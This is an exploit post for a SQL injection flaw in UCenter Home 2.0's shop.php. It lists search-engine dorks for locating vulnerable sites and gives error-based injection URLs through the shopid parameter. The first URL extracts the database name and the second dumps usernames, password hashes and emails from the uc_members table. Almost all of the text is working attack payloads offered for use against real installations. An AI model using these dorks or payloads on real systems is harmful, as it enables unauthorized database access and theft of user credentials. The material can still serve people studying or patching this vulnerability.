__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Parameters : (?)ac=view&shopid=
Vulnerability type : SQL Injection (MySQL error-based, so it relies on the application returning MySQL error text in the response). The shopid value appears to reach the query without being cast to an integer or bound as a parameter.
Needed materials : Hex conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..
DB : Okey.
your edit DB `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okey.
Use Hex conversion and edit your SQL Injection exploit..
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1